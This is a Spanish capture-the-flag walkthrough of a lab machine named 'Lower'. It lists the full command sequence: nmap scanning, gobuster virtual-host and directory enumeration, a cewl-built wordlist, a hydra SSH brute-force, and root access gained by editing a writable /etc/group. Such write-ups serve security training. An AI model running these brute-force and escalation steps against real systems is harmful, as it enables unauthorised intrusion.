Lower
🔍 Dificultad: Muy Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.63
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -p- --open 192.168.1.63 --min-rate 5000 -n
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 192.168.1.63
para obtener más información sobre ese puerto específicamente.

Miramos el puerto 80 en la que ponemos el dominio unique.nyx en /etc/hosts.

Buscamos subdominios.
gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://unique.nyx --append-domain

Encontramos este subdominio por lo que lo añadimos en /etc/hosts.

Aunque encontramos una nueva web no encontramos nada relevante por lo que hacemos una búsqueda de directorios.
gobuster dir -u http://tech.unique.nyx -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

No encontramos nada relevante pero si vemos ciertos posibles usuarios por lo que creamos un diccionario.
cewl http://tech.unique.nyx/ --with-numbers -w usuarios

🚀 EXPLOTACIÓN
Realizamos un ataque de fuerza bruta para obtener las credenciales.
hydra -t 64 -L usuarios -P passwords ssh://192.168.1.63 -F -I

Teniendo las credenciales nos logueamos.
ssh lancer@192.168.1.63

🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar. No tenemos permisos SUDO.
Usamos la herramienta linPEAS que nos ayuda a indetificar para obtener acceso.
scp linpeas.sh lancer@192.168.1.63:/home/lancer

Al ejecutar el script, descubrimos que contamos con permisos de escritura en el archivo /etc/group
. Esto nos permite modificar la configuración de los grupos y agregar al usuario lancer
al grupo sudo
.
nano /etc/group
su --login $USER
id
sudo su

Last updated
Was this helpful?